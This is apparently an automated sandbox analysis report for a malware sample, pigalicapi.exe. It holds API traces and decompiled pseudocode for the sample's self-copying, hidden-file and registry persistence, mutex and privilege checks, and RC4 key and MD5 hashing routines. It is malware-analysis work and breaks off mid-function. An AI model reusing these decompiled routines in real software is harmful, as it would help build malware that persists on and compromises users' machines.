                                                                                                                                                                                                                                                                                          0x04003e7d
                                                                                                                                                                                                                                                                                          0x04003e9e
                                                                                                                                                                                                                                                                                          0x04003ea3
                                                                                                                                                                                                                                                                                          0x04003eab
                                                                                                                                                                                                                                                                                          0x04003f8a
                                                                                                                                                                                                                                                                                          0x04003eb1
                                                                                                                                                                                                                                                                                          0x04003ecc
                                                                                                                                                                                                                                                                                          0x04003ed1
                                                                                                                                                                                                                                                                                          0x04003ed9
                                                                                                                                                                                                                                                                                          0x04003f81
                                                                                                                                                                                                                                                                                          0x04003edf
                                                                                                                                                                                                                                                                                          0x04003efa
                                                                                                                                                                                                                                                                                          0x04003eff
                                                                                                                                                                                                                                                                                          0x04003f07
                                                                                                                                                                                                                                                                                          0x04003f78
                                                                                                                                                                                                                                                                                          0x04003f09
                                                                                                                                                                                                                                                                                          0x04003f09
                                                                                                                                                                                                                                                                                          0x04003f22
                                                                                                                                                                                                                                                                                          0x04003f43
                                                                                                                                                                                                                                                                                          0x04003f48
                                                                                                                                                                                                                                                                                          0x04003f50
                                                                                                                                                                                                                                                                                          0x04003f52
                                                                                                                                                                                                                                                                                          0x04003f52
                                                                                                                                                                                                                                                                                          0x04003f60
                                                                                                                                                                                                                                                                                          0x04003f70
                                                                                                                                                                                                                                                                                          0x04003f70
                                                                                                                                                                                                                                                                                          0x04003f76
                                                                                                                                                                                                                                                                                          0x04003f7f
                                                                                                                                                                                                                                                                                          0x04003f88
                                                                                                                                                                                                                                                                                          0x04003f9a
                                                                                                                                                                                                                                                                                          0x04003fa3
                                                                                                                                                                                                                                                                                          0x04003fd7
                                                                                                                                                                                                                                                                                          0x04003fd9
                                                                                                                                                                                                                                                                                          0x04003fe3
                                                                                                                                                                                                                                                                                          0x04003fe3
                                                                                                                                                                                                                                                                                          0x04003fa5
                                                                                                                                                                                                                                                                                          0x04003fac
                                                                                                                                                                                                                                                                                          0x04003fc4
                                                                                                                                                                                                                                                                                          0x04003fae
                                                                                                                                                                                                                                                                                          0x04003fae
                                                                                                                                                                                                                                                                                          0x04003fb8
                                                                                                                                                                                                                                                                                          0x04003fb8
                                                                                                                                                                                                                                                                                          0x04003fce
                                                                                                                                                                                                                                                                                          0x04003fa3
                                                                                                                                                                                                                                                                                          0x04003ff4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04003ff4

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 04003B2D
                                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(04005DB0), ref: 04003B38
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04003B40
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0400400C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcpyA.KERNEL32(Mvqcsgcuwwini,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(Mvqcsgcuwwini), ref: 04005AAE
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcatA.KERNEL32(00000000,Mvqcsgcuwwini), ref: 04005AC8
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009400: lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                                            • Part of subcall function 04009400: CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
                                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                                            • Part of subcall function 04006060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 04006082
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E00: GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 04003BFA
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegCloseKey.ADVAPI32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegOpenKeyExA.KERNEL32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegCloseKey.ADVAPI32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 04003C85
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04003F70
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 04003FF4
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\pigalicapi.exe$R+g$Vatwyovatk$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                                                          • API String ID: 1389186475-2481894136
                                                                                                                                                                                                                                                                                          • Opcode ID: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                                          • Instruction ID: 63648f9aec36bb26e753af5ac432a688f143a616cbd4529da37374c18a699aed
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EC11AB0944364AAF725DF64AC19BFA77B0AB04709F0480FDE6487A1E1DB7C6A84CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 744 4008800-4008811 745 4008817-400881b 744->745 746 400895c-4008962 744->746 745->746 747 4008821-4008843 CryptAcquireContextA 745->747 748 4008845-4008855 GetLastError 747->748 749 400887a-400887e 747->749 750 4008860-4008874 CryptAcquireContextA 748->750 751 4008857-400885e 748->751 749->746 752 4008884-40088b7 CryptGenKey 749->752 750->749 751->749 751->750 753 4008950-4008956 CryptReleaseContext 752->753 754 40088bd-40088d7 CryptExportKey 752->754 753->746 755 4008946-400894a CryptDestroyKey 754->755 756 40088d9-40088dd 754->756 755->753 757 400893f 756->757 758 40088df-40088e3 756->758 757->755 758->757 759 40088e5-40088e9 758->759 759->757 760 40088eb-40088ef 759->760 760->757 761 40088f1-4008914 CryptImportKey 760->761 762 4008916-4008937 CryptExportKey CryptDestroyKey 761->762 763 400893d 761->763 762->763 763->755
                                                                                                                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                                                                                                                          			E04008800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				long* _v32;
                                                                                                                                                                                                                                                                                          				char* _t41;
                                                                                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                                                                                          				signed int _t43;
                                                                                                                                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                                                                                                                                          				int _t49;
                                                                                                                                                                                                                                                                                          				int _t51;
                                                                                                                                                                                                                                                                                          				char* _t71;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t41 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t42 == 0) {
                                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                          							_t71 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v28 = 0x80;
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						_v24 = _v28 << 0x00000010 | 0x00000001;
                                                                                                                                                                                                                                                                                          						_t43 = _v24;
                                                                                                                                                                                                                                                                                          						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20);
                                                                                                                                                                                                                                                                                          						if(_t43 != 0) {
                                                                                                                                                                                                                                                                                          							_t46 = _a4;
                                                                                                                                                                                                                                                                                          							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
                                                                                                                                                                                                                                                                                          							if(_t46 != 0) {
                                                                                                                                                                                                                                                                                          								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                                          									_v8 = 1;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_v32 = 0;
                                                                                                                                                                                                                                                                                          									_t49 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32); // executed
                                                                                                                                                                                                                                                                                          									if(_t49 != 0) {
                                                                                                                                                                                                                                                                                          										_t51 = _v20;
                                                                                                                                                                                                                                                                                          										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                          										_v8 = _t51;
                                                                                                                                                                                                                                                                                          										CryptDestroyKey(_v32); // executed
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L19;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                                          0x04008806
                                                                                                                                                                                                                                                                                          0x04008811
                                                                                                                                                                                                                                                                                          0x0400895c
                                                                                                                                                                                                                                                                                          0x04008962
                                                                                                                                                                                                                                                                                          0x04008821
                                                                                                                                                                                                                                                                                          0x04008821
                                                                                                                                                                                                                                                                                          0x04008831
                                                                                                                                                                                                                                                                                          0x0400883b
                                                                                                                                                                                                                                                                                          0x04008843
                                                                                                                                                                                                                                                                                          0x0400884b
                                                                                                                                                                                                                                                                                          0x04008855
                                                                                                                                                                                                                                                                                          0x04008869
                                                                                                                                                                                                                                                                                          0x04008874
                                                                                                                                                                                                                                                                                          0x04008874
                                                                                                                                                                                                                                                                                          0x04008855
                                                                                                                                                                                                                                                                                          0x0400887e
                                                                                                                                                                                                                                                                                          0x04008884
                                                                                                                                                                                                                                                                                          0x0400888b
                                                                                                                                                                                                                                                                                          0x0400889b
                                                                                                                                                                                                                                                                                          0x040088a2
                                                                                                                                                                                                                                                                                          0x040088af
                                                                                                                                                                                                                                                                                          0x040088b7
                                                                                                                                                                                                                                                                                          0x040088c1
                                                                                                                                                                                                                                                                                          0x040088cf
                                                                                                                                                                                                                                                                                          0x040088d7
                                                                                                                                                                                                                                                                                          0x040088dd
                                                                                                                                                                                                                                                                                          0x0400893f
                                                                                                                                                                                                                                                                                          0x040088f1
                                                                                                                                                                                                                                                                                          0x040088f1
                                                                                                                                                                                                                                                                                          0x0400890c
                                                                                                                                                                                                                                                                                          0x04008914
                                                                                                                                                                                                                                                                                          0x04008926
                                                                                                                                                                                                                                                                                          0x0400892a
                                                                                                                                                                                                                                                                                          0x04008930
                                                                                                                                                                                                                                                                                          0x04008937
                                                                                                                                                                                                                                                                                          0x04008937
                                                                                                                                                                                                                                                                                          0x0400893d
                                                                                                                                                                                                                                                                                          0x040088dd
                                                                                                                                                                                                                                                                                          0x0400894a
                                                                                                                                                                                                                                                                                          0x0400894a
                                                                                                                                                                                                                                                                                          0x04008956
                                                                                                                                                                                                                                                                                          0x04008956
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400887e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                                          • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 0400894A
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008956
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400882C
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008864
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                                          • Instruction ID: e62ef6a9a3e861f5d7bfaf583d60d4f1649157d47df97182d85979e93aebb629
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E641E972A00209EBFB54EF94C849BAE77B9FB44705F14C518F615B61C0C7B9AA84CF91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 783 4008bb0-4008bc1 784 4008ce7-4008ced 783->784 785 4008bc7-4008bcb 783->785 785->784 786 4008bd1-4008bd5 785->786 786->784 787 4008bdb-4008bdf 786->787 787->784 788 4008be5-4008c07 CryptAcquireContextA 787->788 789 4008c09-4008c19 GetLastError 788->789 790 4008c3e-4008c42 788->790 792 4008c24-4008c38 CryptAcquireContextA 789->792 793 4008c1b-4008c22 789->793 790->784 791 4008c48-4008c61 CryptCreateHash 790->791 794 4008c63-4008c79 CryptHashData 791->794 795 4008cdb-4008ce1 CryptReleaseContext 791->795 792->790 793->790 793->792 796 4008cd1-4008cd5 CryptDestroyHash 794->796 797 4008c7b-4008ca1 CryptGetHashParam 794->797 795->784 796->795 797->796 798 4008ca3-4008ca9 797->798 798->796 799 4008cab-4008cc9 CryptGetHashParam 798->799 799->796 800 4008ccb-4008cce 799->800 800->796
                                                                                                                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                                                                                                                          			E04008BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                                          				char* _t36;
                                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                                                          				char* _t41;
                                                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                                                          				char* _t57;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t36 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                          						_t37 = GetLastError();
                                                                                                                                                                                                                                                                                          						_v16 = _t37;
                                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                          							_t57 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                                          						if(_t37 != 0) {
                                                                                                                                                                                                                                                                                          							_t39 = _a8;
                                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v20, _a4, _t39, 0);
                                                                                                                                                                                                                                                                                          							if(_t39 != 0) {
                                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                                          								_v28 = 4;
                                                                                                                                                                                                                                                                                          								_t41 =  &_v28;
                                                                                                                                                                                                                                                                                          								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
                                                                                                                                                                                                                                                                                          								if(_t41 != 0 && _a16 >= _v24) {
                                                                                                                                                                                                                                                                                          									_v32 = _a16;
                                                                                                                                                                                                                                                                                          									_t43 = _a12;
                                                                                                                                                                                                                                                                                          									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
                                                                                                                                                                                                                                                                                          									if(_t43 != 0) {
                                                                                                                                                                                                                                                                                          										_v8 = _v32;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                                          						}
